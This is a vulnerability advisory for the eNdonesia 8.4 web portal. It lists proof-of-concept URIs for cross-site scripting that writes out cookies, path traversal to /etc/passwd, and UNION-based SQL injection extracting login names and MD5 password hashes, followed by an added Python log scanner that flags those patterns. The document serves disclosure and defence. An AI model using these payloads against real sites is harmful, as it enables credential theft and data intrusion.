Endonesia Multiple Scripts Multiple Input Validation Vulnerabilities
BID:21333
Info
| Bugtraq ID: | 21333 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 26 2006 12:00AM |
| Updated: | Jan 02 2007 03:41PM |
| Credit: | z1ckX(ru) <[email protected]> is credited with the discovery of these vulnerabilities. |
| Vulnerable: | eNdonesia eNdonesia 8.4 |
| Not Vulnerable: | |
Discussion
eNdonesia is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, exploit latent vulnerabilities in the underlying database implementation, or execute arbitrary script code in the context of the application.
Version 8.4 is vulnerable; other versions may also be affected.
Exploit / POC
An attacker can exploit these vulnerabilities via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/en/mod.php?mod=[XSS]&op=viewlink&cid=5
http://www.example.com/en/friend.php your Friend:[XSS]
http://www.example.com/en/admin.php Main Text: [XSS]
http://www.example.com/en/mod.php?mod=informasi&op=showinfo&intypeid=><script>document.write(document.cookie)</script>
http://www.example.com/en/mod.php?mod=../../../../../etc/passwd%00
http://www.example.com/en/mod.php?mod=diskusi&op=viewdisk&did=-4%20union%20select%200,0,name,0,pwd,0,0%20from%20authors/* - LOGIN AND PASS (MD5)
http://www.example.com/en/mod.php?mod=katalog&op=viewlink&cid=-2%20union%20select%200,pwd,0%20from%20authors%20where%20counter=1/*
http://www.example.com/en/mod.php?mod=diskusi&op=viewcat&cid=-2%20union%20select%200,0,0/*
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
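With no vendor patch available, one way to flag requests that match the proof-of-concept patterns above in web server logs is sketched below as an added example (not part of the original advisory and not eNdonesia code). It assumes that legitimate module names are short lowercase identifiers and that cid, did and intypeid are integer identifiers; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the PoC URIs use as numeric identifiers (taken from the advisory).
NUMERIC_PARAMS = {"cid", "did", "intypeid"}
# Assumption: legitimate module names look like "diskusi" or "katalog".
MODULE_NAME = re.compile(r"[a-z0-9_]{1,32}")
INTEGER = re.compile(r"\d{1,10}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def check_request(uri):
    """Return a list of findings for one request URI aimed at mod.php."""
    parts = urlsplit(uri)
    if not parts.path.endswith("/mod.php"):
        return []
    findings = []
    # parse_qsl percent-decodes values, so %00 and %20 are inspected decoded.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "mod" and not MODULE_NAME.fullmatch(value):
            if ".." in value or "\x00" in value:
                findings.append("mod: path traversal or null byte")
            else:
                findings.append("mod: not a plain module name")
        elif name in NUMERIC_PARAMS and not INTEGER.fullmatch(value):
            findings.append(f"{name}: non-integer value")
    return findings


def scan(log_lines):
    """Yield (line_number, uri, findings) for log lines that trip a check."""
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if m and (found := check_request(m.group(1))):
            yield n, m.group(1), found


# Constructed access-log lines; the request targets reuse the PoC URIs above.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Dec/2006:10:00:01 +0000] "GET /en/mod.php?mod=katalog&op=viewlink&cid=5 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [26/Dec/2006:10:00:07 +0000] "GET /en/mod.php?mod=../../../../../etc/passwd%00 HTTP/1.1" 200 913',
    '192.0.2.44 - - [26/Dec/2006:10:00:09 +0000] "GET /en/mod.php?mod=diskusi&op=viewcat&cid=-2%20union%20select%200,0,0/* HTTP/1.1" 200 4410',
    '192.0.2.10 - - [26/Dec/2006:10:00:12 +0000] "GET /en/friend.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, uri, found in scan(SAMPLE_LOG):
        print(n, uri, found)
```

The same two rules (an allowlisted module name, integer-only identifiers) can be enforced at a reverse proxy or WAF in front of the application; they do not cover the form-field XSS in friend.php and admin.php, which needs output encoding in the application itself.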